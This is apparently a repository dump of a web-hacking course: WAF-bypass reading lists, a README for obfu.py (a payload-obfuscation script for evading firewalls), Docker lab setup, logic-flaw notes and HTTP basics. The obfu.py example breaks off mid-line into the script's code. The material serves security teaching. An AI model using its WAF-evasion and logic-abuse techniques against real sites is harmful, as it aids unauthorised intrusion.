warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "{}" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright {yyyy} {name of copyright owner} 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/images/character-interpretations.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/images/character-interpretations.png -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/images/how-wafs-work.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/images/how-wafs-work.png -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/images/waf-general-arch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/images/waf-general-arch.png -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/others/README.md: -------------------------------------------------------------------------------- 1 | ## [`obfu.py`](https://github.com/0xinfection/awesome-waf/blob/master/others/obfu.py) 2 | > A small script to encode and obfuscate your payloads easily to your desired encodings. 3 | 4 | ### Usage: 5 | ``` 6 | $ python obfu.py -h 7 | 8 | OBFUSCATOR 9 | 10 | usage: python3 obfu.py [-h] [-s STR] [-e ENC] [-ueo] [-udi] 11 | 12 | Required Arguments: 13 | -s STR, --str STR String to obfuscate 14 | -e ENC, --enc ENC Encoding type. eg: ibm037, utf16, etc 15 | 16 | Optional Arguments: 17 | -ueo URL Encode Output 18 | -udi URL Decode Input 19 | ``` 20 | ### Example Usage: 21 | ``` 22 | $ python3 obfu.py -s 'param= 1: 57 | parser.print_help() 58 | quit() 59 | print('Input: %s' % (args.str)) 60 | print('Output: %s' % (paramEncode(params=args.str, charset=args.enc, urlDecodeInput=args.udi, urlEncodeOutput=args.ueo))) 61 | 62 | if __name__ == '__main__': 63 | main() 64 | -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/papers/Artificial Neural Network based WAF for SQL Injection.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/papers/Artificial Neural Network based WAF for SQL Injection.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/papers/Bypassing WAF XSS Detection Mechanisms.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/papers/Bypassing WAF XSS Detection Mechanisms.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/papers/Bypassing Web Application Firewalls with HTTP Parameter Pollution.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/papers/Bypassing Web Application Firewalls with HTTP Parameter Pollution.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/papers/Evading All Web-Application Firewalls XSS Filters.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/papers/Evading All Web-Application Firewalls XSS Filters.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/papers/Modern WAF Fingerprinting and XSS Filter Bypass.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/papers/Modern WAF Fingerprinting and XSS Filter Bypass.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/papers/Poking A Hole In The Firewall.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/papers/Poking A Hole In The Firewall.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/papers/Qualys Guide - Protocol-Level WAF Evasion.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/papers/Qualys Guide - Protocol-Level WAF Evasion.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/papers/SANS Guide - WAF Evasion Testing.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/papers/SANS Guide - WAF Evasion Testing.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/papers/Side Channel (Timing) Attacks for Fingerprinting WAF Rules.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/papers/Side Channel (Timing) Attacks for Fingerprinting WAF Rules.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/papers/WASC WAF Evaluation Criteria.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/papers/WASC WAF Evaluation Criteria.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/papers/Web Application Firewalls - Evaluation and Analysis.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/papers/Web Application Firewalls - Evaluation and Analysis.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/presentations/A Forgotten HTTP Invisibility Cloak.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/presentations/A Forgotten HTTP Invisibility Cloak.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/presentations/BlackHat US 12 - Protocol Level WAF Evasion (Slides).pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/presentations/BlackHat US 12 - Protocol Level WAF Evasion (Slides).pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/presentations/BlackHat US 16 - Analysis of Attack Detection Logic.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/presentations/BlackHat US 16 - Analysis of Attack Detection Logic.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/presentations/Building Your Own WAF as a Service and Forgetting about False Positives.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/presentations/Building Your Own WAF as a Service and Forgetting about False Positives.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/presentations/Methods To Bypass A Web Application Firewall.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/presentations/Methods To Bypass A Web Application Firewall.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/presentations/OWASP WAF Profiling & Evasion.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/presentations/OWASP WAF Profiling & Evasion.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/presentations/Our Favourite XSS WAF Filters And How To Bypass Them.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/presentations/Our Favourite XSS WAF Filters And How To Bypass Them.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/presentations/Playing Around with WAFs.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/presentations/Playing Around with WAFs.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/presentations/Side Channel Attacks for Fingerprinting WAF Filter Rules.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/presentations/Side Channel Attacks for Fingerprinting WAF Filter Rules.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/presentations/WAF Bypasses and PHP Exploits (Slides).pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/presentations/WAF Bypasses and PHP Exploits (Slides).pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/presentations/WEb Application Firewall Bypassing (How to Defeat the Blue Team).pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/presentations/WEb Application Firewall Bypassing (How to Defeat the Blue Team).pdf -------------------------------------------------------------------------------- /lesson_notes/docker_course/01.dockerBasic.md: -------------------------------------------------------------------------------- 1 |

Basic Practical Docker and Containerization

2 | 3 | ## What is Docker? 4 | 5 | [Referece Photo Link](Ref:https://www.accenture.com/us-en/blogs/software-engineering-blog/shinde-docker-containerization-devops) 6 | 7 | ![Docker Explain](../photo/docker.png) 8 | 9 | ## Docker images VS Container 10 | 11 | ![ContVsImage](../photo/docker2.png) 12 | 13 | ## Install Docker and skopeo on Linux 14 | `sudo apt install docker.io` 15 | 16 | `sudo apt install skopeo` 17 | 18 | ## Enable Docker on linux 19 | `sudo systemctl enable docker --now` 20 | 21 | ## You can now get started with using docker, with sudo. If you want to add yourself to the docker group to use docker without sudo, an additional step is needed:??? 22 | 23 | `sudo usermod -aG docker $USER` 24 | 25 | # Essential Command 26 | 27 | >### Searching Docker image from Repository (DockerHub) 28 | >`sudo docker search imageName` 29 | 30 | >### Pulling (Downloading) images to local Computer 31 | >`sudo docker pull imageName` 32 | 33 | >### How to look local images 34 | >`sudo docker images` 35 | > 36 | >### How to inspect Local image (Show image detail infromation) 37 | >`sudo docker inspect ImageID` 38 | > 39 | >### How to inspect remote registory images 40 | >`skopeo inspect docker://mysql` 41 | 42 | 43 | ## How to run local container images 44 | ``` 45 | sudo docker images 46 | sudo docker run imageid 47 | ``` 48 | ## How to find running container (Docker see container as process) 49 | 50 | `sudo docker ps` 51 | 52 | `sudo docker container ls` 53 | 54 | ## How to find all container (including not running container) 55 | `sudo docker ps -a` 56 | 57 | ## How to save docker image in local computer (.tar format) 58 | 59 | `docker save imagesID > ImageName.tar` 60 | 61 | ## How to remove docker container 62 | 63 | `sudo docker rm containerID or Name` 64 | 65 | ## How to remove docker images 66 | 67 | `sudo docker rmi imageID or Name` 68 | 69 | ## Checking Docker Resource Usage 70 | 71 | `sudo docker stats` 72 | 73 |

Container Mangement with Portainer (Web App)

74 | 75 | ## Install portainer docker file 76 | 77 | `docker search portainer` 78 | 79 | `docker pull portainer/portainer-ce` 80 | 81 | 82 | ## Run portainer docker file 83 | 84 | 85 | `docker run --name portainer -p 9000:9000 -v "/var/run/docker.sock:/var/run/docker.sock" imageID or Name` 86 | 87 | ### Notes 88 | > * you can use my portianer script to run portainer 89 | > * please disconnect VPN otherwise localhost did not work 90 | > * you can use docker ip and port instead of localhost and local port 91 | -------------------------------------------------------------------------------- /lesson_notes/docker_course/02.ZD Research Lab Installation in Docker.md: -------------------------------------------------------------------------------- 1 |

ZD Lab Installation for Pentest

2 | 3 | ## Steps for Lab Installation 4 | 5 | 1. Install docker software in Linux 6 | 2. Pull the docker image 7 | 3. kill server 8 | 4. Scripting 9 | 10 | 11 | 12 | 13 | ## Install Docker in Linux 14 | `sudo apt install docker.io` 15 | 16 | ## Enable Docker 17 | 18 | `sudo systemctl enable docker --now` 19 | 20 | 21 | ## You can now get started with using docker, with sudo. If you want to add yourself to the docker group to use docker without sudo, an additional step is needed:??? 22 | 23 | `sudo usermod -aG docker $USER` 24 | 25 | 26 | 27 | ## Pull the docker imag and install it 28 | 29 | > ## Interactive mode 30 | 31 | > `sudo docker run -p 8080:80 -it zdresearch/advanced-web-hacking http://localhost:8080` 32 | 33 | > ## Demon Mode 34 | > `sudo docker run -p 8080:80 -td zdresearch/advanced-web-hacking http://localhost:8080` 35 | 36 | ## How to kill server 37 | 38 | `sudo docker kill imageid` -------------------------------------------------------------------------------- /lesson_notes/docker_course/lab.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | read -p "Enter port number you want to bind: " port 5 | sudo docker run -p $port:80 -it zdresearch/advanced-web-hacking http://localhost:$port 6 | 7 | -------------------------------------------------------------------------------- /lesson_notes/docker_course/portainer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | read -p "Please port nubmer your want to bind : " port 4 | read -p "Please enter name for container : " name 5 | 6 | sudo docker run --name $name -p $port:9000 -v "/var/run/docker.sock:/var/run/docker.sock" portainer/portainer-ce 7 | 8 | -------------------------------------------------------------------------------- /lesson_notes/photo/HTTP.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/HTTP.png -------------------------------------------------------------------------------- /lesson_notes/photo/URL_structure.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/URL_structure.png -------------------------------------------------------------------------------- /lesson_notes/photo/anti_csrf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/anti_csrf.png -------------------------------------------------------------------------------- /lesson_notes/photo/client&server.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/client&server.png -------------------------------------------------------------------------------- /lesson_notes/photo/com_inject.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/com_inject.png -------------------------------------------------------------------------------- /lesson_notes/photo/csrf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/csrf.png -------------------------------------------------------------------------------- /lesson_notes/photo/csrf_lab.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/csrf_lab.png -------------------------------------------------------------------------------- /lesson_notes/photo/docker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/docker.png -------------------------------------------------------------------------------- /lesson_notes/photo/docker2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/docker2.png -------------------------------------------------------------------------------- /lesson_notes/photo/http_structure.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/http_structure.png -------------------------------------------------------------------------------- /lesson_notes/photo/inband.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/inband.png -------------------------------------------------------------------------------- /lesson_notes/photo/oob.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/oob.png -------------------------------------------------------------------------------- /lesson_notes/photo/openBounty_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/openBounty_1.png -------------------------------------------------------------------------------- /lesson_notes/photo/openBounty_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/openBounty_2.png -------------------------------------------------------------------------------- /lesson_notes/photo/openBounty_3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/openBounty_3.png -------------------------------------------------------------------------------- /lesson_notes/photo/openRe.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/openRe.png -------------------------------------------------------------------------------- /lesson_notes/photo/phishing.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/phishing.png -------------------------------------------------------------------------------- /lesson_notes/photo/report.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/report.png -------------------------------------------------------------------------------- /lesson_notes/photo/request_header.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/request_header.png -------------------------------------------------------------------------------- /lesson_notes/photo/sav.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/sav.png -------------------------------------------------------------------------------- /lesson_notes/photo/sqli.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/sqli.png -------------------------------------------------------------------------------- /lesson_notes/photo/sqli2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/sqli2.png -------------------------------------------------------------------------------- /lesson_notes/photo/sqli3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/sqli3.png -------------------------------------------------------------------------------- /lesson_notes/photo/sqli4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/sqli4.png -------------------------------------------------------------------------------- /lesson_notes/photo/ssrf1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/ssrf1.png -------------------------------------------------------------------------------- /lesson_notes/photo/ssrf2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/ssrf2.png -------------------------------------------------------------------------------- /lesson_notes/photo/ssrf3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/ssrf3.png -------------------------------------------------------------------------------- /lesson_notes/photo/ssrf4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/ssrf4.png -------------------------------------------------------------------------------- /lesson_notes/photo/ssrf5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/ssrf5.png -------------------------------------------------------------------------------- /lesson_notes/photo/url.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/url.png -------------------------------------------------------------------------------- /lesson_notes/photo/waf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/waf.png -------------------------------------------------------------------------------- /lesson_notes/photo/waf_function.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/waf_function.png -------------------------------------------------------------------------------- /lesson_notes/photo/webArchi.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/webArchi.png -------------------------------------------------------------------------------- /lesson_notes/w-10.0_Logic_flaws/logic_flaw_theory.md: -------------------------------------------------------------------------------- 1 | # Business Logic Flaws (or) Logic Flaws 2 | 3 | [Reference](https://portswigger.net/web-security/logic-flaws/examples) 4 | 5 | 6 | - Vulnerability in the `design and implementation` of application 7 | - If the logic or rules are directly related to buisness, known as `business logic flaws`. If not, know as `application logic vulnerabilities` or `logic flaws` 8 | - Can found in complicated systems because the development team themselves do not fully understand 9 | - Most security problems are weaknesses in an application that result from a broken or missing security control (authentication, access control, input validation, etc…) 10 | - if the developers assume that users will pass data exclusively `via a web browser`, the application may rely entirely on `weak client-side controls` to validate input. These are easily `bypassed by an attacker using an intercepting proxy`. 11 | 12 | 13 | # Impact of Business Logic Flaws 14 | 15 | - It is a broad category and the impact is highly variable 16 | - the impact of any logic flaw depends on what functionality it is related to 17 | - If the flaw is in the authentication mechanism, for example, this could have a serious impact on your overall security. Attackers could potentially exploit this for privilege escalation, or to bypass authentication entirely, gaining access to sensitive data and functionality 18 | - Flawed logic in financial transactions can obviously lead to massive losses for the business through stolen funds, fraud, and so on. 19 | 20 | 21 | # How to prevent 22 | 23 | - Make sure developers and testers understand the domain that the application serves 24 | - Maintain clear design documents and data flows for all transaction and workflows 25 | - wirte code as clearly as possible 26 | - Note any references to other code that uses each component. Think about any side-effects of these dependencies if a malicious party were to manipulate them in an unusual way 27 | -------------------------------------------------------------------------------- /lesson_notes/w-10.0_Logic_flaws/methodology.md: -------------------------------------------------------------------------------- 1 | # Methodology for Hunting Logic Bugs 2 | 3 | 1. Click all button and mapping the application logic 4 | 2. Make number negative 5 | 3. User fraction number (e.g `100*0.5`) 6 | 4. Change other user information -------------------------------------------------------------------------------- /lesson_notes/w-2.1_webArchi_Ref/UNIT 6(WWW&HTTP&WAP).pptx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-2.1_webArchi_Ref/UNIT 6(WWW&HTTP&WAP).pptx -------------------------------------------------------------------------------- /lesson_notes/w-2.1_webArchi_Ref/Web_Architecture.md: -------------------------------------------------------------------------------- 1 |

How Website Work

2 |
3 | 4 | # Web Architecture 5 |
6 | 7 | ![Web Archi](../photo/webArchi.png) 8 | 9 |
10 | 11 | # Client and server site
12 | 13 | ![Web Archi](../photo/client&server.png) 14 | 15 | ## Client Side 16 | 17 | 1. Html 18 | 2. CSS 19 | 3. Java Script 20 | 21 | 22 | ## Server side 23 | 24 | 1. PHP 25 | 2. Python 26 | 3. MySQL 27 | 4. etc.... 28 | 29 | # URL (Uniform Resource Loactor) 30 | 31 | ## The uniform resource locator (URL) is a standard for specifying any kind of information on the Internet. 32 | ## URL defines four things: 33 | * Protocol 34 | * host computer 35 | * Port 36 | * path 37 |
38 | 39 | ![Web Archi](../photo/url.png) 40 | 41 | # Eg 42 | `https://www.google.com/photos/about/` 43 | 44 | -------------------------------------------------------------------------------- /lesson_notes/w-2.2_Web_Technologies/w-2.1_web_tech.md: -------------------------------------------------------------------------------- 1 | # Web Technologies 2 | 3 | ## Web Application 4 | 5 | - `Web Application` is web-based software that performs actions (function) based on `user input` and usually interacts with a`backend systems` 6 | 7 | ## Web Server 8 | - Software running on the operation system of a server tha allow connections to access a web Application. 9 | 10 | 11 | ## Web Server Root Directory 12 | 13 | - Window 14 | `C:\Inetpub\wwwroot` 15 | 16 | - Linux 17 | 18 | `/var/www` 19 | 20 | - `var`: This directory includes the files for databases, system logs, and the source code for web application itself! 21 | 22 | 23 | ## HTTP 24 | 25 | ![How HTTP Work](../photo/HTTP.png) 26 | #[photo_reference](https://medium.com/sina-ahmadi/java-http-server-616797710f54) 27 | 28 | - `Hypertext Transfer Protocol` 29 | 30 | - HTTP use message-based model 31 | - Client send request message and server send response message 32 | 33 | ## HTTP structure 34 | 35 | ![HTTP_Structure](../photo/http_structure.png) 36 | 37 | 38 | 39 | 40 | #### URL (Uniform Resource Locator) 41 | 42 | - Unique Address for a `Resource` on server 43 | - `Resource` = photo, file, personal prfiles, data, etc.. 44 | 45 | ![URL_Structure](../photo/URL_structure.png) 46 | 47 | [Photo_Reference](https://ahrefs.com/blog/seo-friendly-urls) 48 | 49 | 50 | #### Method 51 | 52 | - The method tells the server what kind of action the client wants 53 | 54 | 55 | `GET` — used to retrieve or read a resource. If successful, the response will contain the resource specified in the URL. APIs mainly deal in JSOn and XML files. ** GET Request do not have message body ** 56 | 57 | `POST` — used to create new resources, including subordinate resources to already existing nouns. A successful response will contain the URL of the newly created resource. 58 | 59 | `PUT` — used to update an existing resource. The request will also contain the new information that should replace the existing one in the resource. 60 | 61 | `PATCH` — like PUT, updates an existing resource, but differently. Instead of sending the new data, it sends instructions on how to modify the current resource. 62 | 63 | `DELETE` — used to, as the name suggests, delete a resource. 64 | 65 | ## HTTP Header 66 | 67 | `You can use live header browser entension to monitor header well` 68 | 69 | ![Header](../photo/request_header.png) 70 | [photo_reference](https://code.tutsplus.com/tutorials/http-headers-for-dummies--net-8039) 71 | 72 | - `key: value` 73 | 74 | #### `Host` Header 75 | - Specify the host name that appear in full URL 76 | - This is necessary when multiple website are hosted on the same server 77 | 78 | #### `Content-Length` Header 79 | 80 | - Value is the length of the response body in `bytes` 81 | - It is helpful to hacker to decipher the application response to input (especially brute-force attacks) 82 | 83 | #### `Location` Header 84 | 85 | - This Header is used when application redirect a user to a new page 86 | 87 | #### `cookie` Header 88 | 89 | - `cookie` - a small piece of data from website or web server that stored within user computer by web browser. 90 | - They can also be used to save for subsequent use information that the user previously entered into form fields, such as names, addresses, passwords, and payment card numbers. 91 | 92 | - This Header send cookie back to the server to maintain user's session 93 | 94 | - ** This cookie provide valid session and it can be use in attacks against other application users ** 95 | 96 | #### Referrer Header 97 | 98 | - This header list the webpage that the user was previously on , `the last page visit` 99 | -------------------------------------------------------------------------------- /lesson_notes/w-2.6_Basic_Terminologies/w-2.6.a_Hacking_terminology.md: -------------------------------------------------------------------------------- 1 |

Basic Terminology

2 | 3 | ## 1.Vulnerability 4 | 5 | - It is a wekness of a system 6 | 7 | ## 8 | 9 | ## 2. Injection 10 | 11 | - malicious input to a web application (inject it) 12 | 13 | ## 3. Injection Point 14 | 15 | - where vulnerability can be exit 16 | 17 | ## 4. Payload 18 | 19 | - Payload is a Script or Code that used to idnetify vulnerability
